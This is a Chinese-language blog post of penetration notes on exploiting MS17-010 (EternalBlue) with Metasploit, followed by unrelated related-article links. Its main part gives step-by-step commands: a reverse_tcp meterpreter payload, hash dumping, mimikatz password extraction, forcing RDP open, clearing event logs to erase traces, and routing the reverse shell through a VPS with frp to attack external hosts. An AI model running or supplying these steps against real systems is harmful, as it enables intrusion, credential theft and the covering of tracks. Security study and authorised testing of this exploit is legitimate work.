kali ms17_010 内网环境下渗透笔记
一.先用Router Scan 扫描
看清楚了网络拓扑结构。
二.使用MS17-010批量扫描工具
下载:ms17-010Scan.exe (也可以用kali自带的nmap和ms17-10模块扫)
三.漏洞利用
kali 终端输入
msfconsole
search ms17-010 要是搜不到,请更新你的msf
use exploit/windows/smb/ms17_010_eternalblue
set RHOST 192.168.1.66 设置目标机ip
set payload windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.1.104 设置本机监听ip ,默认LPORT端口为4444 同一个C段才算同一个局域网。不在的话,就会很麻烦(kali 是在虚拟机的话,改为桥接)
exploit 开始执行漏洞利用模块
当出现meterpreter> 说明利用成功
在实验室,五台环境配置相同的机子(ps:都开启防火墙和腾讯安全管家)只成功了一台。其他的总是出现无法连接上445端口。也百度不到答案
四.远程登录目标机
meterpreter>migrate 616 关闭对方防火墙
meterpreter>screenshot 截屏
meterpreter>hashdump 获取目标机hash值
meterpreter>load mimikatz 启动mimikatz
meterpreter>msv 导出hash值
meterpreter>kerberos 获得目标机的账号密码(要是空密码,就要自己创建一个用户,不过会被安全软件拦截)
另开一个终端(!!!!!!!!!!是另开一个!!!!!!!!)
rdesktop 192.168.1.66 -u 账号 -p 密码
要是连不上就要开3389
meterpreter > run getgui -e 开3389命令,然后再执行上一条命令
meterpreter >clearev 擦除痕迹再跑路
五.内网打外网(2018/6/12更新)
首先把自己的端口转发出去,可以用路由器。博主是用frpc。
环境:操作机内网192.168.1.1 目标机外网 222.222.222.222 一台公网vps 111.111.111.111
frpc.ini
[common]
server_addr = 111.111.111.111
server_port = 1024
[RAT]
type = tcp
local_ip = 192.168.1.1
local_port = 4444
remote_port = 7002
auth_token = 123
//把192.168.1.1:4444转发到111.111.111.111:7002
运行代理
root@kali:~/Desktop/frp/frp_0.17.0_linux_amd64# ./frpc
第一个msf攻击
msfconsole
use exploit/windows/smb/ms17_010_eternalblue
set RHOST 222.222.222.222 设置目标机ip
set payload windows/x64/meterpreter/reverse_tcp
set LHOST 111.111.111.111 vps的ip
set LPORT 7002 转发到vps的端口
exploit
另开一个msf监听
msfconsole
msf > use exploit/multi/handler
msf exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf exploit(multi/handler) > set LHOST 192.168.1.1
LHOST => 192.168.1.1
msf exploit(multi/handler) > run
kali ms17_010 内网环境下渗透笔记的更多相关文章
- 内网环境下为Elasticsearch 5.0.2 添加head服务
背景: 本项目的服务器是内网环境,没有网络,因此需要在离线的环境中,安装head服务. 需要用到的安装包有: node的安装包 elasticsearch的head插件源码 说明:此次只讲述为elas ...
- 虚拟机系统ubuntu12.04(内网环境下的虚拟主机)开启远程连接访问
一.工具准备: 1.内网虚拟机Ubuntu12.04系统主机一台,开放端口为:29999 2.远程连接软件:mobaxterm 二.开启步骤: 1.查看端口状态信息: netstat -antl | ...
- 内网环境下搭建maven私服小技巧
背景 最近接手一个其他公司的项目,因为工程中使用了maven,而且里面有很多他们自己封装很多自己的构件(就是jar.war等等),需要将他们maven私服迁移到我们的私服上去,因为网络环境不通,所以不 ...
- ArcGIS API for javascript开发笔记(二)——解决ArcGIS Service中的服务在内网环境下无法进行javascript预览问题
感谢一路走来默默支持和陪伴的你~~~ ----------------------------拒绝转载-------------------------------- 1.问题说明 在使用ArcGIS ...
- 内网环境上部署k8s+docker集群:集群ftp的yum源配置
接触docker已经有一年了,想把做的时候的一些知识分享给大家. 因为公司机房是内网环境无法连接外网,所以这里所有的部署都是基于内网环境进行的. 首先,需要通过ftp服务制作本地的yum源,可以从ht ...
- Centos7.2内网环境安装MySQL5.7.24
1.配置本地yum源 内网环境,首先需要配置本地yum源,以解决MySQL的依赖安装,具体参考该文:点击打开 2.查看服务器环境 uname -a 3.去官网下载MySQL安装包 MySQL官网网址: ...
- 内网环境搭建NTP服务器
说在前面:ntp和ntpdate区别 ①两个服务都是centos自带的(centos7中不自带ntp).ntp的安装包名是ntp:ntpdate的安装包是ntpdate.他们并非由一个安装包提供. ② ...
- FtpServer穿透内网访问配置踩笔记
FtpServer穿透内网访问配置踩笔记 引言 FtpServer是服务器文件远程管理常用方式. 以前在局域网配置Ftp服务器以及使用公网上的Ftp服务均未碰到问题,固未对Ftp传输进行深入了解. 然 ...
- Linux系统如何在离线环境或内网环境安装部署Docker服务和其他服务
如何在离线环境或纯内网环境的Linux机器上安装部署Docker服务或其他服务.本次我们以Docker服务和Ansible服务为例. 获取指定服务的所有rpm包 保证要获取rpm包的机器能够上网. 本 ...
随机推荐
- HTML5/HTML 4.01/XHTML 元素和有效的 DTD
HTML5/HTML 4.01/XHTML 元素和有效的 DTD 下面的表格列出了所有的 HTML5/HTML 4.01/XHTML 元素,以及它们会出现在什么文档类型 (DTD) 中: 标签 HTM ...
- Linux基础命令列表
命令列表 A alias apt apt-get arp -n -s arping ab B bc basename bash -n -x bzip2 bunzip2 bzcat blkid brct ...
- poj1050 To the Max(降维dp)
To the Max Time Limit: 1000MS Memory Limit: 10000K Total Submissions: 49351 Accepted: 26142 Desc ...
- VMware Workstatition启动虚拟机电脑蓝屏
电脑出了点问题,重装了系统,结果安装VMware之后,一启动虚拟机电脑就蓝屏重启. 系统是win10 19041 开始用的原来下载的vmware15.0,创建虚拟机蓝屏,重启之后可以创建.创建完以后启 ...
- 【总结】docker
1 docker概述 1.1 docker简介 Docker目标是实现轻量级的操作系统虚拟化解决方案.比虚拟机更轻量级. 虚拟机可以理解成一栋楼里的一个个房间(共享花园基地等),而docker可以理解 ...
- 撸个反向代理,激活JRebel~
持续原创输出,点击上方蓝字关注我 目录 前言 本地反向代理 服务器反向代理[个人推荐] IDEA安装JRebel并激活 服务器安装JRebel并激活 总结 前言 热部署相信大家都听说过,比如Sprin ...
- Hadoop基础------>MR框架-->WordCount
认识Mapreduce Mapreduce编程思想 Mapreduce执行流程 java版本WordCount实例 1. 简介: Mapreduce源于Google一遍论文,是谷歌Mapreduce的 ...
- TypeError: render() got an unexpected keyword argument ‘renderer‘
关注公众号"轻松学编程"了解更多 原因 在使用xadmin时,如果是Django2版本以上的会报这个错误.这是由于xadmin中的文件xadmin\views\dashboard. ...
- scrapy反反爬虫
反反爬虫相关机制 Some websites implement certain measures to prevent bots from crawling them, with varying d ...
- Lock Her Up
题意描述 同样没有链接.... Problem 2: Lock Her Up [Jan Kuipers, 2003] Bessie has been bad again and Farmer John ...